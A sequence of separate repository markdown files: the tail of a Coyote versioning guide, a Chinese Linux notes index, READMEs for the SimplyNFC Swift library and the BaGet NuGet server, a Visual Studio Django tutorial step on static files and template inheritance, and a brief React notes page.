* anything else changes in the the Coyote framework.
Not all changes to the repository warrant a version change. For example,
* test code changes
* documentation only fixing typos and grammar
* automation script updates
* reformatting of code for styling changes
## Process
Developers maintain `History.md` with each checkin, adding bullet points to the
top version number listed with an asterix. For example, it might look like this:
```
## v2.4.5*
- Fix some concurrency bugs in the framis checker.
```
The asterix means this version has not yet reached the master branch on github. Each developer
modifies this the new version number in `History.md` according to the above rules. For example, one
developer might fix a bug and bump the **patch** version number from "v2.4.5*" to "v2.4.6*". Another
might then add a big new feature that warrants a major version change, so they will change the
top record in `History.md` from "v2.4.6*" to "v3.0.0*". All other changes made from there will leave
the number at "v3.0.0" until these bits are pushed to the master branch in github.
When all this is pushed to github in a Pull Request, `Common\version.props` and
`Scripts\NuGet\Coyote.nuspec` are updated with the new version number listed in `History.md` and the
asterix is removed, indicating this version number is now locked. The next person to change the repo will then start a new version number record in `History.md` and add the asterix to indicate to everyone else
that this new number is not yet locked.
The contents in `History.md` is then copied to the github release page, which makes it easy to do
a release. There is no need to go searching through the change log to come up with the right
release summary. Code reviews are used to ensure folks remember to update this `History.md` file. | 51.272727 | 209 | 0.775177 | eng_Latn | 0.999172 |
61d6a7f43780bfdc7fcf88d4f6089295d217befa | 6,996 | md | Markdown | README.md | cxfans/linux-notes | 6e53c5d082d061581bac40d09826ba48bc24f4e0 | [
"MIT"
] | null | null | null | README.md | cxfans/linux-notes | 6e53c5d082d061581bac40d09826ba48bc24f4e0 | [
"MIT"
] | null | null | null | README.md | cxfans/linux-notes | 6e53c5d082d061581bac40d09826ba48bc24f4e0 | [
"MIT"
] | 1 | 2020-07-11T08:52:27.000Z | 2020-07-11T08:52:27.000Z | ---
date: 2022-03-19T18:47:48+08:00 # 创建日期
author: "Rustle Karl" # 作者
# 文章
title: "Linux 学习笔记" # 文章标题
description: "纸上得来终觉浅,学到过知识点分分钟忘得一干二净,今后无论学什么,都做好笔记吧。"
url: "posts/linux/README" # 设置网页永久链接
tags: [ "Linux", "README" ] # 标签
series: [ "Linux 学习笔记" ] # 系列
categories: [ "学习笔记" ] # 分类
index: true # 是否可以被索引
toc: true # 是否自动生成目录
draft: false # 草稿
---
# Linux 学习笔记
> 纸上得来终觉浅,学到过知识点分分钟忘得一干二净,今后无论学什么,都做好笔记吧。
## 目录结构
- `assets/images`: 笔记配图
- `assets/templates`: 笔记模板
- `docs`: 基础语法
- `tools`: 常用工具
- `tools/standard`: 标准常用工具
- `tools/tripartite`: 第三方常用工具
- `quickstart`: 基础用法
- `src`: 源码示例
- `src/docs`: 基础语法源码示例
## 基础知识
- [Linux 的启动过程](docs/base/boot.md)
- [Shell 脚本基础语法](docs/base/shell_script.md)
- [pipeline 管道符与输入输出](docs/base/pipeline.md)
- [Linux 串口与 USB 转串口问题](docs/base/serial_port.md)
- [Linux 防火墙配置 iptables 和 firewalld](docs/base/firewall.md)
- [Linux 存储结构与磁盘划分](docs/base/storage.md)
- [Linux 用户与权限](docs/base/user.md)
## 基础用法
- [Linux CPU 性能测试](quickstart/bench.md)
### 安装配置
```
cinst rufus
```
- [Ubuntu 系统重装后的基本配置](quickstart/install/ubuntu_desktop.md)
- [Ubuntu 安装 Nvidai 显卡驱动](quickstart/install/ubuntu_desktop_nvidia.md)
- [OpenSSH 教程](quickstart/openssh.md)
- [Fish Shell 安装与主题切换](quickstart/shell/fish.md)
- [Ubuntu WSL 问题笔记](quickstart/install/ubuntu_wsl.md)
- [Kali Linux WSL 问题笔记](quickstart/install/kali_wsl.md)
- [MacOS 基本配置](quickstart/install/macos.md)
- [VMware 安装 MacOS](quickstart/install/macos_vmware.md)
## 常用工具
### 包管理器
- [apk Alpine Linux 下的包管理工具](tools/pkg-manager/apk.md)
- [apt-get Debian Linux 发行版中的 APT 软件包管理工具](tools/pkg-manager/apt-get.md)
- [apt-key 管理 Debian Linux 系统中的软件包密钥](tools/pkg-manager/apt-key.md)
- [brew MacOS 包管理器](tools/pkg-manager/brew.md)
- [dnf 新一代的 RPM 软件包管理器](tools/pkg-manager/dnf.md)
- [dpkg Debian Linux 系统上安装、创建和管理软件包](tools/pkg-manager/dpkg.md)
- [opkg OpenWrt 包管理器](tools/pkg-manager/opkg.md)
- [yum 基于 RPM 的软件包管理器](tools/pkg-manager/yum.md)
### 系统自带工具
- [alias 设置别名](tools/standard/alias.md)
- [at 设置一次性定时执行任务](tools/standard/at.md)
- [awk 文本处理](tools/standard/awk.md)
- [chattr 设置文件的隐藏权限](tools/standard/chattr.md)
- [unalias 取消别名](tools/standard/unalias.md)
- [cat 打印到标准输出](tools/standard/cat.md)
- [cd 改变当前工作目录](tools/standard/cd.md)
- [chmod 设置文件或目录的权限](tools/standard/chmod.md)
- [chown 设置文件或目录的所有者和所属组](tools/standard/chown.md)
- [chsh 更改登录 Shell](tools/standard/chsh.md)
- [cp 复制](tools/standard/cp.md)
- [crontab 设置长期性计划任务](tools/standard/crontab.md)
- [ctrlaltdel 设置组合键 `Ctrl+Alt+Del` 的功能](tools/standard/ctrlaltdel.md)
- [cut 按列提取文本字符](tools/standard/cut.md)
- [date 打印或者设置系统日期和时间](tools/standard/date.md)
- [dd 复制文件或转换文件](tools/standard/dd.md)
- [df 显示文件系统的信息](tools/standard/df.md)
- [diff 按行比较多个文本文件的内容差异](tools/standard/diff.md)
- [disown 从作业中移除](tools/standard/disown.md)
- [du 查看磁盘使用情况](tools/standard/du.md)
- [e2fsck 检查文件系统的完整性](tools/standard/e2fsck.md)
- [echo 在标准输出回显字符串](tools/standard/echo.md)
- [edquota 编辑用户的 quota 配额限制](tools/standard/edquota.md)
- [export 在当前会话修改环境变量](tools/standard/export.md)
- [fdisk 管理硬盘设备](tools/standard/fdisk.md)
- [file 确定文件类型](tools/standard/file.md)
- [find 按照指定条件查找文件](tools/standard/find.md)
- [getfacl 显示文件上设置的 ACL 信息](tools/standard/getfacl.md)
- [groupadd 创建新的用户组](tools/standard/groupadd.md)
- [halt 中断系统](tools/standard/halt.md)
- [head 打印文件前几行](tools/standard/head.md)
- [history 显示、管理以前执行过的命令](tools/standard/history.md)
- [free 查询内存资源信息](tools/standard/free.md)
- [grep 搜索匹配关键词](tools/standard/grep.md)
- [ifconfig 获取网卡配置与网络状态等信息](tools/standard/ifconfig.md)
- [id 显示指定用户的相关信息](tools/standard/id.md)
- [kill 终止进程](tools/standard/kill.md)
- [killall 终止指定名称的全部进程](tools/standard/killall.md)
- [ln 创建链接文件](tools/standard/ln.md)
- [last 显示用户的登录日志](tools/standard/last.md)
- [lsblk 列出块设备信息](tools/standard/lsblk.md)
- [lsattr 显示文件的隐藏权限](tools/standard/lsattr.md)
- [ls 列出目录下文件的权限和属性信息](tools/standard/ls.md)
- [lsof 列出当前系统打开的文件](tools/standard/lsof.md)
- [blkid 查看块设备的文件系统类型](tools/standard/blkid.md)
- [mount 挂载文件系统](tools/standard/mount.md)
- [mkdir 创建目录](tools/standard/mkdir.md)
- [mkfs 格式化硬盘,创建文件系统](tools/standard/mkfs.md)
- [mv 移动,重命名](tools/standard/mv.md)
- [nohup 以忽略挂起信号的方式运行程序](tools/standard/nohup.md)
- [passwd 修改用户名密码](tools/standard/passwd.md)
- [pidof 打印指定进程名称的全部 PID 值](tools/standard/pidof.md)
- [poweroff 关闭操作系统,切断系统电源](tools/standard/poweroff.md)
- [ps 显示系统进程状态](tools/standard/ps.md)
- [pwd 输出当前工作目录](tools/standard/pwd.md)
- [reboot 重启系统](tools/standard/reboot.md)
- [rm 移除项目](tools/standard/rm.md)
- [scp 在网络之间进行安全传输数据](tools/standard/scp.md)
- [screen 命令行终端切换](tools/standard/screen.md)
- [setsid 让进程在新的会话中运行](tools/standard/setsid.md)
- [shutdown 关闭操作系统](tools/standard/shutdown.md)
- [source 在当前终端执行来自一个文件的命令](tools/standard/source.md)
- [sudo 给普通用户提供额外的权限](tools/standard/sudo.md)
- [tail 打印文件最后几行](tools/standard/tail.md)
- [tmux 运行多个终端会话](tools/standard/tmux.md)
- [top 进程活动监视](tools/standard/top.md)
- [touch 创建空白文件](tools/standard/touch.md)
- [umount 卸载文件系统](tools/standard/umount.md)
- [userdel 删除用户](tools/standard/userdel.md)
- [su 切换用户](tools/standard/su.md)
- [stat 查询文件、文件系统状态信息](tools/standard/stat.md)
- [sed 文本编辑](tools/standard/sed.md)
- [read 从标准输入读取一行,依次赋值](tools/standard/read.md)
- [swapon 挂载 swap 分区](tools/standard/swapon.md)
- [setfacl 管理文件的 ACL 规则](tools/standard/setfacl.md)
- [partprobe 通知操作系统分区表的更改](tools/standard/partprobe.md)
- [tr 字符替换](tools/standard/tr.md)
- [tar 对文件进行打包压缩或解压](tools/standard/tar.md)
- [pvcreate 初始化供 LVM 使用的物理卷](tools/standard/pvcreate.md)
- [useradd 创建新的用户](tools/standard/useradd.md)
- [uptime 查询系统负载信息](tools/standard/uptime.md)
- [uname 获取当前系统信息](tools/standard/uname.md)
- [usermod 修改用户的属性](tools/standard/usermod.md)
- [wget 非交互式网络下载器](tools/standard/wget.md)
- [wc 统计指定文本的行数、单词数、字符数、字节数等](tools/standard/wc.md)
- [whereis 定位文件位置](tools/standard/whereis.md)
- [which 定位可执行命令的位置](tools/standard/which.md)
- [who 显示当前用户名及其启动的终端信息](tools/standard/who.md)
### 第三方工具
- [ab 服务器性能测试工具](tools/tripartite/ab.md)
- [hdparm 显示与设定硬盘的参数](tools/tripartite/hdparm.md)
- [iotop 监视磁盘I/O使用状况的工具](tools/tripartite/iotop.md)
- [iostat 监视系统输入输出设备和 CPU 的使用情况](tools/tripartite/iostat.md)
- [rsync 同步文件](tools/tripartite/rsync.md)
- [vim 文本编辑器](tools/tripartite/vim.md)
- [htop 动态观察系统进程状况](tools/tripartite/htop.md)
- [root 用户启动 google chrome](tools/tripartite-gui/google-chrome.md)
- [proxychains 与 graftcp 原理对比](tools/tripartite-gui/proxychains_graftcp.md)
## Linux网络编程
- [第1章_Linux操作系统概述](docs/Linux网络编程/第1章_Linux操作系统概述.md)
- [第2章_Linux编程环境](docs/Linux网络编程/第2章_Linux编程环境.md)
- [第3章_文件系统简介](docs/Linux网络编程/第3章_文件系统简介.md)
- [第4章_程序、进程和线程](docs/Linux网络编程/第4章_程序、进程和线程.md)
- [第5章_TCP_IP协议族简介](docs/Linux网络编程/第5章_TCP_IP协议族简介.md)
- [第7章_TCP网络编程基础](docs/Linux网络编程/第7章_TCP网络编程基础.md)
- [第8章_服务器和客户端信息的获取](docs/Linux网络编程/第8章_服务器和客户端信息的获取.md)
- [第9章_数据的IO和复用](docs/Linux网络编程/第9章_数据的IO和复用.md)
- [第10章_基于UDP协议的接收和发送](docs/Linux网络编程/第10章_基于UDP协议的接收和发送.md)
- [第11章_高级套接字](docs/Linux网络编程/第11章_高级套接字.md)
- [第15章_IPv6简介](docs/Linux网络编程/第15章_IPv6简介.md)
## 问题
- [ssh 问题](issues/ssh.md)
| 35.333333 | 75 | 0.738851 | yue_Hant | 0.168633 |
61d6eea2842829bfee47812db66793214748eac9 | 2,353 | md | Markdown | README.md | yanngodeau/SimplyNFC | fc4191fb389c5732db0629ceb7d8f971949b1e7a | [
"MIT"
] | 1 | 2022-03-26T17:09:44.000Z | 2022-03-26T17:09:44.000Z | README.md | yanngodeau/SimplyNFC | fc4191fb389c5732db0629ceb7d8f971949b1e7a | [
"MIT"
] | null | null | null | README.md | yanngodeau/SimplyNFC | fc4191fb389c5732db0629ceb7d8f971949b1e7a | [
"MIT"
] | null | null | null | # SimplyNFC
Simply read and write NFC tags with iPhone (iOS 14.0+)
[](https://github.com/yanngodeau/SimplyNFC/blob/main/LICENSE)
[](https://github.com/yanngodeau/SimplyNFC)
[](https://swift.org)
## Installation
### Swift package manager
Go to `File | Swift Packages | Add Package Dependency...` in Xcode and search for « SimplyNFC »
### Cathage
You can use [Carthage](https://github.com/Carthage/Carthage) to install `SimplyNFC` by adding it to your `Cartfile`.
```swift
github "yanngodeau/SimplyNFC"
```
### Manual
1. Put SimplyNFC repo somewhere in your project directory.
2. In Xcode, add `SimplyNFC.xcodeproj` to your project
3. On your app's target, add the SimplyNFC framework:
1. as an embedded binary on the General tab.
2. as a target dependency on the Build Phases tab.
## Usage
### Read tag
Reading `NCFNDEFMessage` from tag
```swift
import SimplyNFC
let nfcManager = NFCManager()
nfcManager.read { manager in
// Session did become active
manager.setMessage("👀 Place iPhone near the tag to read")
} didDetect: { manager, result in
switch result {
case .failure:
manager.setMessage("👎 Failed to read tag")
case .success:
manager.setMessage("🙌 Tag read successfully")
}
```
### Write on tag
Writing `NFCNDEFMessage` on tag
```swift
import SimplyNFC
let nfcManager = NFCManager()
nfcManager.write(message: ndefMessage) { manager in
// Session did become active
manager.setMessage("👀 Place iPhone near the tag to be written on")
} didDetect: { manager, result in
switch result {
case .failure:
manager.setMessage("👎 Failed to write tag")
case .success:
manager.setMessage("🙌 Tag successfully written")
}
```
## Contribute
- Fork it!
- Create your feature branch: `git checkout -b my-new-feature`
- Commit your changes: `git commit -am 'Add some feature'`
- Push to the branch: `git push origin my-new-feature`
- Submit a pull request
## License
SimplyNFC is distributed under the [MIT License](https://mit-license.org).
## Author
- Yann Godeau - [@yanngodeau](https://github.com/yanngodeau)
Based on code by [@tattn](https://github.com/tattn)
| 25.576087 | 138 | 0.709307 | eng_Latn | 0.768206 |
61d7260aca24da52dcb0c42ae3e55d22d3bf5744 | 101 | md | Markdown | content/labs/lab02.md | Democratising-Forecasting/advanced-forecasting | 5f4c0a9b29e7bea1382c2155c41ec22f539cafb2 | [
"CC0-1.0"
] | null | null | null | content/labs/lab02.md | Democratising-Forecasting/advanced-forecasting | 5f4c0a9b29e7bea1382c2155c41ec22f539cafb2 | [
"CC0-1.0"
] | null | null | null | content/labs/lab02.md | Democratising-Forecasting/advanced-forecasting | 5f4c0a9b29e7bea1382c2155c41ec22f539cafb2 | [
"CC0-1.0"
] | null | null | null | ---
output:
md_document:
preserve_yaml: true
variant: gfm
layout: page
title: Lab 02
---
| 10.1 | 23 | 0.633663 | eng_Latn | 0.605634 |
61d77777332a7ddf974859602300bbe4a88455f3 | 6,201 | md | Markdown | readme.md | schizoid90/BaGet | 20b54c09f646035047a44dd699210f921a7e194d | [
"MIT"
] | null | null | null | readme.md | schizoid90/BaGet | 20b54c09f646035047a44dd699210f921a7e194d | [
"MIT"
] | null | null | null | readme.md | schizoid90/BaGet | 20b54c09f646035047a44dd699210f921a7e194d | [
"MIT"
] | null | null | null | # BaGet :baguette_bread:
[](https://sharml.visualstudio.com/BaGet/_build/latest?definitionId=2) [](https://gitter.im/BaGetServer/community?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)
A lightweight [NuGet](https://docs.microsoft.com/en-us/nuget/what-is-nuget) and [Symbol](https://docs.microsoft.com/en-us/windows/desktop/debug/symbol-servers-and-symbol-stores) server.
<p align="center">
<img width="100%" src="https://user-images.githubusercontent.com/737941/50140219-d8409700-0258-11e9-94c9-dad24d2b48bb.png">
</p>
## Getting Started
1. Install [.NET Core SDK](https://www.microsoft.com/net/download)
2. Download and extract [BaGet's latest release](https://github.com/loic-sharma/BaGet/releases)
3. Start the service with `dotnet BaGet.dll`
4. Browse `http://localhost:5000/` in your browser
For more information, please refer to [our documentation](https://loic-sharma.github.io/BaGet/).
## Features
* Cross-platform
* [Dockerized](https://loic-sharma.github.io/BaGet/#running-baget-on-docker)
* [Cloud ready](https://loic-sharma.github.io/BaGet/cloud/azure/)
* [Supports read-through caching](https://loic-sharma.github.io/BaGet/configuration/#enabling-read-through-caching)
* Can index the entirety of nuget.org. See [this documentation](https://loic-sharma.github.io/BaGet/tools/mirroring/)
* Coming soon: Supports [private feeds](https://loic-sharma.github.io/BaGet/private-feeds/)
* And more!
Stay tuned, more features are planned!
## Develop
1. Install [.NET Core SDK](https://www.microsoft.com/net/download) and [Node.js](https://nodejs.org/)
2. Run `git clone https://github.com/loic-sharma/BaGet.git`
3. Navigate to `.\BaGet\src\BaGet.UI`
4. Install the frontend's dependencies with `npm install`
5. Navigate to `..\BaGet`
6. Start the service with `dotnet run`
7. Open the URL `http://localhost:5000/v3/index.json` in your browser
## Helm
### Package/Install
* Clone repo then run helm package
```
helm package baget
```
You can then push that chart to any helm repository you want and install from there
```
helm install -g myrepo/baget
```
* Install without package
```
helm install -g baget
```
Modify the isntallation by either editing the `values.yaml` file or passing the parameters you want to change with `--set`
```
helm install -g baget --set fullname=nuget,persistence.enabled=true,persistence.stoageClass=someclass
```
### Configure
| Parmeter | Description | Default |
|-------------------------------|---------------------------------------------------------|-----------------------------------|
| `fullname` | Name of the deployment | `baget` |
| `gracePeriod` | terminationGracePeriodSeconds setting | `10` |
| `image` | Name of the image to deploy | `loicsharma/baget` |
| `imageVersion` | Version of the image to deploy | `latest` |
| `namespaceOverride` | Override context namespace | `` |
| `replicas` | Number of pods to deploy | `1` |
| `env.apiKey` | API key users will use to auth | `` |
| `env.storageType` | Type of storage to be used | `FileSystem` |
| `env.storagePath` | Path to use for storage | `/var/baget/packages` |
| `env.databaseType` | Type of database | `Sqlite` |
| `env.databaseConnectionString`| Connection string for db | `Data Source=/var/baget/baget.db` |
| `env.searchType` | Type of search to carry out | `Database` |
| `ingress.enabled` | Enable and create an ingress | `false` |
| `ingress.hosts` | External DNS of the app | `name: "", tls: false, secret: ""`|
| `persistence.acceesMode` | Storage access mode | `ReadWriteOnce` |
| `persistence.enabled` | Enable and use persistent storage | `false` |
| `persistence.path` | Path to mount pvc | `/var/baget` |
| `persistence.size` | Size of the pvc | `10G` |
| `persistence.storageClass` | Storage class for pvc | `` |
| `persistence.volumeName` | Name of existing pv | `` |
| `resources.requests` | Compute resource requests | `mem: 100Mi, cpu: 100m` |
| `resources.limits` | Compute resource limits | `mem: 250Mi, cpu: 200m` |
| `service.enabled` | Enable and create service | `true` |
| `service.NodePort` | Specify Node port (relies on `service.type: NodePort`) | `` |
| `service.serviceName` | Name of the service | `{{ .Values.fullname }}-svc` |
| `service.type` | Type of service to create | `ClusterIP` |
| 62.01 | 390 | 0.506692 | eng_Latn | 0.393393 |
61d792cbda5cd4812c628b79377339914280f73a | 15,492 | md | Markdown | docs/python/learn-django-in-visual-studio-step-03-serve-static-files-and-add-pages.md | prasanthlouis/visualstudio-docs | 66383e8c9c108819b4272ff4682737b622623474 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/python/learn-django-in-visual-studio-step-03-serve-static-files-and-add-pages.md | prasanthlouis/visualstudio-docs | 66383e8c9c108819b4272ff4682737b622623474 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/python/learn-django-in-visual-studio-step-03-serve-static-files-and-add-pages.md | prasanthlouis/visualstudio-docs | 66383e8c9c108819b4272ff4682737b622623474 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Learn Django tutorial in Visual Studio step 3, static files and pages
titleSuffix: ""
description: A walkthrough of Django basics in the context of Visual Studio projects, specifically demonstrating how to serve static files, add pages to the app, and use template inheritance
ms.date: 11/19/2018
ms.prod: visual-studio-dev15
ms.topic: tutorial
author: kraigb
ms.author: kraigb
manager: jillfra
ms.custom: seodec18
ms.workload:
- python
- data-science
---
# Step 3: Serve static files, add pages, and use template inheritance
**Previous step: [Create a Django app with views and page templates](learn-django-in-visual-studio-step-02-create-an-app.md)**
In the previous steps of this tutorial, you've learned how to create a minimal Django app with a single page of self-contained HTML. Modern web apps, however, are typically composed of many pages, and make use of shared resources like CSS and JavaScript files to provide consistent styling and behavior.
In this step, you learn how to:
> [!div class="checklist"]
> - Use Visual Studio item templates to quickly add new files of different types with convenient boilerplate code (step 3-1)
> - Configure the Django project to serve static files (step 3-2)
> - Add additional pages to the app (step 3-3)
> - Use template inheritance to create a header and nav bar that's used across pages (step 3-4)
## Step 3-1: Become familiar with item templates
As you develop a Django app, you typically add many more Python, HTML, CSS, and JavaScript files. For each file type (as well as other files like *web.config* that you may need for deployment), Visual Studio provides convenient [item templates](python-item-templates.md) to get you started.
To see available templates, go to **Solution Explorer**, right-click the folder in which you want to create the item, select **Add** > **New Item**:

To use a template, select the desired template, specify a name for the file, and select **OK**. Adding an item in this manner automatically adds the file to your Visual Studio project and marks the changes for source control.
### Question: How does Visual Studio know which item templates to offer?
Answer: The Visual Studio project file (*.pyproj*) contains a project type identifier that marks it as a Python project. Visual Studio uses this type identifier to show only those item templates that are suitable for the project type. This way, Visual Studio can supply a rich set of item templates for many project types without asking you to sort through them every time.
## Step 3-2: Serve static files from your app
In a web app built with Python (using any framework), your Python files always run on the web host's server and are never transmitted to a user's computer. Other files, however, such as CSS and JavaScript, are used exclusively by the browser, so the host server simply delivers them as-is whenever they're requested. Such files are referred to as "static" files, and Django can deliver them automatically without you needing to write any code.
A Django project is configured by default to serve static files from the app's *static* folder, thanks to these lines in the Django project's *settings.py*:
```python
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = posixpath.join(*(BASE_DIR.split(os.path.sep) + ['static']))
```
You can organize files using any folder structure within *static* that you like, and then use relative paths within that folder to refer to the files. To demonstrate this process, the following steps add a CSS file to the app, then use that stylesheet in the *index.html* template:
1. In **Solution Explorer**, right-click the **HelloDjangoApp** folder in the Visual Studio project, select **Add** > **New folder**, and name the folder `static`.
1. Right-click the **static** folder and select **Add** > **New item**. In the dialog that appears, select the **Stylesheet** template, name the file `site.css`, and select **OK**. The **site.css** file appears in the project and is opened in the editor. Your folder structure should appear similar to the following image:

1. Replace the contents of *site.css* with the following code and save the file:
```css
.message {
font-weight: 600;
color: blue;
}
```
1. Replace the contents of the app's *templates/HelloDjangoApp/index.html* file with the following code, which replaces the `<strong>` element used in step 2 with a `<span>` that references the `message` style class. Using a style class in this way gives you much more flexibility in styling the element. (If you haven't moved *index.html* into a subfolder in *templates* when using VS 2017 15.7 and earlier, refer to [template namespacing](learn-django-in-visual-studio-step-02-create-an-app.md#template-namespacing) in step 2-4.)
```html
<html>
<head>
<title>{{ title }}</title>
{% load staticfiles %} <!-- Instruct Django to load static files -->
<link rel="stylesheet" type="text/css" href="{% static 'site.css' %}" />
</head>
<body>
<span class="message">{{ message }}</span>{{ content }}
</body>
</html>
```
1. Run the project to observe the results. Stop the server when done, and commit your changes to source control if you like (as explained in [step 2](learn-django-in-visual-studio-step-02-create-an-app.md#commit-to-source-control)).
### Question: What is the purpose of the {% load staticfiles %} tag?
Answer: The `{% load staticfiles %}` line is required before referring to static files in elements like `<head>` and `<body>`. In the example shown in this section, "staticfiles" refers to a custom Django template tag set, which is what allows you to use the `{% static %}` syntax to refer to static files. Without `{% load staticfiles %}`, you'll see an exception when the app runs.
### Question: Are there any conventions for organizing static files?
Answer: You can add other CSS, JavaScript, and HTML files in your *static* folder however you want. A typical way to organize static files is to create subfolders named *fonts*, *scripts*, and *content* (for stylesheets and any other files). In each case, remember to include those folders in the relative path to the file in `{% static %}` references.
## Step 3-3: Add a page to the app
Adding another page to the app means the following:
- Add a Python function that defines the view.
- Add a template for the page's markup.
- Add the necessary routing to the Django project's *urls.py* file.
The following steps add an "About" page to the "HelloDjangoApp" project, and links to that page from the home page:
1. In **Solution Explorer**, right-click the **templates/HelloDjangoApp** folder, select **Add** > **New item**, select the **HTML Page** item template, name the file `about.html`, and select **OK**.
> [!Tip]
> If the **New Item** command doesn't appear on the **Add** menu, make sure that you've stopped the server so that Visual Studio exits debugging mode.
1. Replace the contents of *about.html* with the following markup (you replace the explicit link to the home page with a simple navigation bar in step 3-4):
```html
<html>
<head>
<title>{{ title }}</title>
{% load staticfiles %}
<link rel="stylesheet" type="text/css" href="{% static 'site.css' %}" />
</head>
<body>
<div><a href="home">Home</a></div>
{{ content }}
</body>
</html>
```
1. Open the app's *views.py* file and add a function named `about` that uses the template:
```python
def about(request):
return render(
request,
"HelloDjangoApp/about.html",
{
'title' : "About HelloDjangoApp",
'content' : "Example app page for Django."
}
)
```
1. Open the Django project's *urls.py* file and add the following line to the `urlPatterns` array:
```python
url(r'^about$', HelloDjangoApp.views.about, name='about'),
```
1. Open the *templates/HelloDjangoApp/index.html* file and add the following line below the `<body>` element to link to the About page (again, you replace this link with a nav bar in step 3-4):
```html
<div><a href="about">About</a></div>
```
1. Save all the files using the **File** > **Save All** menu command, or just press **Ctrl**+**Shift**+**S**. (Technically, this step isn't needed as running the project in Visual Studio saves files automatically. Nevertheless, it's a good command to know about!)
1. Run the project to observe the results and check navigation between pages. Close the server when done.
### Question: I tried using "index" for the link to the home page, but it didn't work. Why?
Answer: Even though the view function in *views.py* is named `index`, the URL routing patterns in the Django project's *urls.py* file does not contain a regular expression that matches the string "index". To match that string, you need to add another entry for the pattern `^index$`.
As shown in the next section, it's much better to use the `{% url '<pattern_name>' %}` tag in the page template to refer to the *name* of a pattern, in which case Django creates the proper URL for you. For example, replace `<div><a href="home">Home</a></div>` in *about.html* with `<div><a href="{% url 'index' %}">Home</a></div>`. The use of 'index' works here because the first URL pattern in *urls.py* is, in fact, named 'index' (by virtue of the `name='index'` argument). You can also use 'home' to refer to the second pattern.
## Step 3-4: Use template inheritance to create a header and nav bar
Instead of having explicit navigation links on each page, modern web apps typically use a branding header and a navigation bar that provides the most important page links, popup menus, and so on. To make sure the header and nav bar are the same across all pages, however, you don't want to repeat the same code in every page template. You instead want to define the common parts of all your pages in one place.
Django's templating system provides two means for reusing specific elements across multiple templates: includes and inheritance.
- *Includes* are other page templates that you insert at a specific place in the referring template using the syntax `{% include <template_path> %}`. You can also use a variable if you want to change the path dynamically in code. Includes are typically used in the body of a page to pull in the shared template at a specific location on the page.
- *Inheritance* uses the `{% extends <template_path> %}` at the beginning of a page template to specify a shared base template that the referring template then builds upon. Inheritance is commonly used to define a shared layout, nav bar, and other structures for an app's pages, such that referring templates need only add or modify specific areas of the base template called *blocks*.
In both cases, `<template_path>` is relative to the app's *templates* folder (`../` or `./` are also allowed).
A base template delineates blocks using `{% block <block_name> %}` and `{% endblock %}` tags. If a referring template then uses tags with the same block name, its block content override that of the base template.
The following steps demonstrate inheritance:
1. In the app's *templates/HelloDjangoApp* folder, create a new HTML file (using the **Add** > **New item** context menu or **Add** > **HTML Page**) called *layout.html*, and replace its contents with the markup below. You can see that this template contains a block named "content" that is all that the referring pages need to replace:
```html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>{{ title }}</title>
{% load staticfiles %}
<link rel="stylesheet" type="text/css" href="{% static 'site.css' %}" />
</head>
<body>
<div class="navbar">
<a href="/" class="navbar-brand">Hello Django</a>
<a href="{% url 'home' %}" class="navbar-item">Home</a>
<a href="{% url 'about' %}" class="navbar-item">About</a>
</div>
<div class="body-content">
{% block content %}{% endblock %}
<hr/>
<footer>
<p>© 2018</p>
</footer>
</div>
</body>
</html>
```
1. Add the following styles to the app's *static/site.css* file (this walkthrough isn't attempting to demonstrate responsive design here; these styles are simply to generate an interesting result):
```css
.navbar {
background-color: lightslategray;
font-size: 1em;
font-family: 'Trebuchet MS', 'Lucida Sans Unicode', 'Lucida Grande', 'Lucida Sans', Arial, sans-serif;
color: white;
padding: 8px 5px 8px 5px;
}
.navbar a {
text-decoration: none;
color: inherit;
}
.navbar-brand {
font-size: 1.2em;
font-weight: 600;
}
.navbar-item {
font-variant: small-caps;
margin-left: 30px;
}
.body-content {
padding: 5px;
font-family:'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
}
```
1. Modify *templates/HelloDjangoApp/index.html* to refer to the base template and override the content block. You can see that by using inheritance, this template becomes simple:
```html
{% extends "HelloDjangoApp/layout.html" %}
{% block content %}
<span class="message">{{ message }}</span>{{ content }}
{% endblock %}
```
1. Modify *templates/HelloDjangoApp/about.html* to also refer to the base template and override the content block:
```html
{% extends "HelloDjangoApp/layout.html" %}
{% block content %}
{{ content }}
{% endblock %}
```
1. Run the server to observe the results. Close the server when done.

1. Because you'd made substantial changes to the app, it's again a good time to [commit your changes to source control](learn-django-in-visual-studio-step-02-create-an-app.md#commit-to-source-control).
## Next steps
> [!div class="nextstepaction"]
> [Use the full Django Web Project template](learn-django-in-visual-studio-step-04-full-django-project-template.md)
## Go deeper
- [Deploy the web app to Azure App Service](publishing-python-web-applications-to-azure-from-visual-studio.md)
- [Writing your first Django app, part 3 (views)](https://docs.djangoproject.com/en/2.0/intro/tutorial03/) (docs.djangoproject.com)
- For more capabilities of Django templates, such as control flow, see [The Django template language](https://docs.djangoproject.com/en/2.0/ref/templates/language/) (docs.djangoproject.com)
- For complete details on using the `{% url %}` tag, see [url](https://docs.djangoproject.com/en/2.0/ref/templates/builtins/#url) within the [Built-in template tags and filters for Django templates reference](https://docs.djangoproject.com/en/2.0/ref/templates/builtins/) (docs.djangoproject.com)
- Tutorial source code on GitHub: [Microsoft/python-sample-vs-learning-django](https://github.com/Microsoft/python-sample-vs-learning-django)
| 54.742049 | 531 | 0.702363 | eng_Latn | 0.989792 |
61d92a1d5b0d02db62aabaeddff77e29201a0f23 | 270 | md | Markdown | docs/front/React/README.md | ht1131589588/web-library | 467e624da4e20962f0a837c9d9043db014d574c7 | [
"MIT"
] | 5 | 2019-09-06T12:18:08.000Z | 2021-08-09T03:31:49.000Z | docs/front/React/README.md | ht1131589588/web-library | 467e624da4e20962f0a837c9d9043db014d574c7 | [
"MIT"
] | 33 | 2019-11-26T01:09:41.000Z | 2021-06-29T02:13:34.000Z | docs/front/React/README.md | ht1131589588/web-library | 467e624da4e20962f0a837c9d9043db014d574c7 | [
"MIT"
] | 2 | 2019-08-02T18:07:46.000Z | 2019-09-20T06:19:38.000Z | # React系列
学好一门技术,需要经历大概三个过程:读文档,运用,看源码
